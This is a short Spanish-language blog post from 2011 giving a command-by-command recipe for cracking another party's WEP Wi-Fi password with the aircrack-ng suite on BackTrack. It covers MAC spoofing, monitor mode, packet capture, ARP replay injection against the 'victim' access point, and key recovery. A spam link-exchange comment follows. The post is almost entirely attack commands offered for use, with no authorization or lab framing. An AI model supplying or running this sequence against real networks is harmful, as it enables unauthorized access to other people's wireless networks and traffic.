abrimos una shell
airmon-ng stop eth1     
para saber nuestra interfas ponemos esto notra eth1 es la interfas que yo manejo la interfas es la tarjeta que usas
ifconfig eth1 down
macchanger --mac 00:11:22:33:44:55 eth1      
para cambiar nuestra mac
airmon-ng start eth1        
para activar nuestra tarjeta en modo monitor
airodump-ng eth1         
para ver redes al alcance nota copiar la mac el canal y el nombre de la red
airodump-ng --channel x --write pass eth1       
 esto crea un archivo  para poder capturar la red nota en la x sustituir por el canal que esta la red y en donde dice pass pueden poner lo que quieran
aireplay-ng -3 -b (mac de la victima) -h 00:11:22:33:44:55 eth1       
 ahora esto es para las señales arp cuando tengamos 62,000 arp estara listo
aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h 00:11:22:33:44:55 eth1   
esto se ace para acelerar el proceso en recuperar  arp
aircrack-ng pass-01.cap 
       para sacar la pass,, cuando tengamos 62,000 arp detenemos todas las shell y ponemos esto para encontrar la clave wep y listo
Encotrar claves wep con backtrack
jueves, 9 de junio de 2011
Publicado por JVRINCHES en 13:44
Suscribirse a:
Enviar comentarios (Atom)
1 comentarios:
Hola
Mi nombre es Paulina y administro un directorio y buscador de webs y blogs. Me ha gustado mucho http://jvrinches.blogspot.com/, me gustaria intercambiar enlaces. Puedo agregar tu pagina en nuestro directorio para que así mis visitantes puedan visitarla tambien.
Si te interesa, escribeme al mail: p.cortez80@gmail.com
Saludos
Pau
Publicar un comentario